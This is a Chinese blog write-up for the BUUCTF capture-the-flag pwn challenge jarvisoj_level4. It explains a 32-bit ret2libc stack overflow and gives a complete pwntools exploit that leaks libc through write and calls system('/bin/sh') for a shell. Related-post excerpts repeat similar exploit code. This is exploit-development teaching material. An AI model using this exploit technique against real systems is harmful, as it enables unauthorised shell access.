BUUCTF-jarvisoj_level4

最新推荐文章于 2025-03-26 20:58:37 发布
原创 最新推荐文章于 2025-03-26 20:58:37 发布 · 708 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#python #pwn #安全

本文介绍了一种针对32位程序的ret2libc栈溢出攻击技术,利用write函数泄露地址,进而获取libc基址,最终实现通过system函数调用/bin/sh获得shell的过程。

checksec

 

IDA

 

很明显的栈溢出,没有system(bin/sh) 

32位的ret2libc3

EXP

老规矩的脚本

from pwn import *

#start
r = remote("node4.buuoj.cn",29365)
# r = process("../buu/jarvisoj_level4")
elf = ELF("./34level4")
libc = ELF("./libc-2.23-32.so")

#params
write_plt = elf.plt['write']
write_got = elf.got['write']
main_addr = elf.symbols['main']

#attack
payload = b'M'*(0x88+4) + p32(write_plt) + p32(main_addr) + p32(1) +p32(write_got) +p32(4)
r.sendline(payload)
write_addr = u32(r.recv(4))

#libc
base_addr = write_addr - libc.symbols['write']
system_addr = base_addr + libc.symbols['system']
bin_sh_addr = base_addr + next(libc.search(b'/bin/sh'))

#attack2
payload = b'M'*(0x88+4) + p32(system_addr) + p32(main_addr) + p32(bin_sh_addr)
r.sendline(payload)

r.interactive()

BUUCTF---jarvisoj_level4
qq_33010875的博客
09-26 411
环境:WSL2,ubuntu16.04python2 checksec文件: 将文件拖入ida 溢出点: 和level3不同的是 read函数之前没有调用write函数,因此要泄露libc的基地址需要用read函数,利用write函数将read函数在got表中的地址泄露出来 payload = (0x88+0x04)*'a'+p32(write_plt)+p32(main_addr)+p(1)+p32(read_got)+p(4) 接受泄露出来的地址 read_addr = u32(io.recv(
[BUUCTF]PWN--------jarvisoj_level4
BangSen1的博客
04-02 529
jarvisoj_level4 例行检查,32位,开启NX保护 运行一下 用IDA打开。查看主函数 查看vulnerable_function()函数 buf存在溢出漏洞。 是一道ret2libc类型的题目。 利用第一次溢出泄露libc版本,从而获取system函数和"/bin/sh"的地址,并且返回重新执行主函数。 再利用第二次栈溢出跳转执行system("/bin/sh") from pwn import * from LibcSearcher import * context(os = "
[BUUCTF-pwn]——jarvisoj_level4
Y_peak的博客
02-22 321
[BUUCTF-pwn]——jarvisoj_level4 点我看 write up exploit from pwn import * from LibcSearcher import * p = remote("node3.buuoj.cn",26929) elf = ELF("./level4") write_plt = elf.plt['write'] write_got = elf.got['write'] main_addr = elf.sym['main'] payload = 'a' *
[BUUCTF]PWN-jarvisoj_level4
红凳子的博客
04-07 634
[BUUCTF]PWN-jarvisoj_level4前言一、程序分析二、漏洞利用方法一:使用LibcSearcher寻找libc版本方法二:使用DynELF函数进行泄露 前言 在这篇文章中将学习到劫持read函数、使用LibcSearcher寻找libc版本和DynELF函数的使用 提示:以下是本篇文章正文内容,下面案例可供参考 一、程序分析 从中可以看出,32位程序,i386架构,开启了NX保护。 输入点在vulnerable_function里,read试图向长度0x88的地址空间写入0x10
Jarvis OJ Level4
qq_39153421的博客
09-19 505
写在最前面:  在漏洞利用的时候,如果没有给出libc库,可以先泄漏两个函数的地址,然后再去查libc的版本号。但是,这种有时候可能失效。现在利用DynELF工具来泄漏system函数的地址,然后再往一个地方写’/bin/sh’字符串并构造调用system函数的栈。下面以Jarvis OJ中的level4这道题为例,使用DynELF实现漏洞利用。   在写之前先了解...
BUUCTF-PWN】8-jarvisoj_level2
燕麦葡萄干的博客
07-05 462
32位的分布是:返回地址+下一次的返回地址+参数1+参数2+…这里没有可以直接利用的后门函数,所以需要构造 system(/bin/sh)去执行。system的地址还不是0x0804A038,而是0x08048320。查看vulnerable_function()函数。需要找不是extern的system函数。/bin/sh的地址0x0804A024。read()函数存在缓冲区溢出漏洞。32位,开启了NX保护。
buuctf-jarvisoj_level0(pwn)题解
2301_81574836的博客
02-18 582
buuctf-jarvisoj_level0(pwn)题解
BUUCTF-PWN】13-jarvisoj_level2_x64
燕麦葡萄干的博客
07-05 779
ret指令的地址,再接着是’/bin/sh’字符串的地址,最后是system()函数的地址。ret处,该指令会将当前栈顶的元素(‘/bin/sh’字符串的地址)出栈并存入rdi中,并返回到下一条指令处。此时栈中就只有system()函数的地址了,所以下一条指令正是system(),而它需要的参数正好就在rdi寄存器中,这样就执行了system(’/bin/sh’)现在只需要让函数返回到system,并传入参数“/bin/sh”就可以了。32位的比较简单,只需要返回地址+下一次的返回地址+参数1+参数2+…
BUUCTF-PWN题详解(pwn1_sctf_2016 1&jarvisoj_level0 1)
2302_80325559的博客
11-27 2653
今天给大家介绍了几个危险函数strcpy、read,以及Python pwn模块的一些函数用法。这几天也做了这六道溢出的题,思路大差不差,都是先找从哪儿溢出,然后后门的地址。如果大家可以自己独立做出来的话,就可以说只要以后见到这种题,分分钟拿下。后面的题就不会留这么明显的后门给我们了,会让我们自己创建后门,难度会大一点点。我尽量以简洁的语言给大家说清楚,大家一起加油!
BUUCTF jarvisoj_level5
最新发布
2401_85052854的博客
03-26 355
主要的函数只有这个,没有后门函数,保护只开了nx,也就是常见的ret2libc的攻击方式,这里主要考的是再64位的传参,这个read肯定是很足够来栈溢出的。我们先用Roggadget来寻找rdi和rsi和rdx的地址,但是找不到rdx的地址,但是我们找到了和rsi连在一起的r15,也可以拿来当第三个参数存放。
jarvisoj_level4
、moddemod
06-30 340
exp from pwn import * from LibcSearcher import * context.log_level = 'debug' proc_name = './level4' p = process(proc_name) # p = remote('node3.buuoj.cn', 27523) .
BUUCTFjarvisoj_level4(write up)
qq_44768749的博客
08-24 1074
这里写目录标题0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01 文件分析 开启了栈不可执行、部分RELRO保护 0x02 运行 简单的输入一个字符串 0x03 IDA 漏洞点在vulnerable_function输入长度可以造成栈溢出 0x04 思路 没有提供system函数和"/bin/sh"的地址 第一次栈溢出泄露libc版本,从而获取system函数和"/bin/sh"的地址,并且返回主函数 第二次栈溢出跳转执行system("/bin/
Jarvis OJ --level4
Kni9hT's Blog
11-11 336
level4level1、2、3的区别在于:无system、无"/bin/sh"、无libc 要点:使用DynELF函数leak system函数真实地址,然后用read函数写"/bin/sh\x00"到bss段,然后调用system("/bin/sh")去getshell。 题目链接: level4.0f9cfa0b7bb6c0f9e030a5541b46e9f0 先查看开了哪些保护: 和l...
jarvisoj——[XMAN]level4
王嘟嘟的博客
07-19 586
题目 Wp 检查基础项,有NX保护 ida看的时候还是之前的那种,但是没有给lib,需要自己去找 那么这里第一步,肯定是找到system的地址 第二步将/bin/sh写入bss字段 第三部调用即可
jarvisoj-level4
m0_73743784的博客
09-01 561
非常经典的ret2libc,只是要注意 32 位的和 64 位的差别,以及使用write函数和使用puts函数的差别。
jarvisoj_level0
08-14
引用是一段关于利用pwntools库对jarvisoj_level0进行攻击的代码。代码中使用了remote()方法建立了远程连接,并构造了一个payload来利用栈溢出漏洞,最终执行callsystem()函数来获取shell权限。引用也是类似的代码,...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值